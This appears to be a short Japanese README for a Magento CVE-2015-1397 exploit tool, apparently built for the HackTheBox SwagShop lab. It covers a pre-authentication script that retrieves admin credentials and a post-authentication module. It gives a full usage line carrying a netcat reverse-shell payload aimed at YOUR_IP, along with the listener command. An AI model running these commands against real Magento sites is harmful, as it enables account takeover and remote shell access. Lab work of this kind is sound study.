
Magento CMSのCVE-2015-1397のエクスプロイトスクリプト。管理者資格情報を取得する事前認証エクスプロイトと、リバースシェル実行のための認証後RCEモジュールを含む。
HackTheBox - SwagShop で確認された脆弱性
Magento CMS ダッシュボードへの管理者認証情報を取得する
exploit.py から取得した認証情報を post_auth.py に追加して実行:
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"
リスナー:
nc -lvnp 4444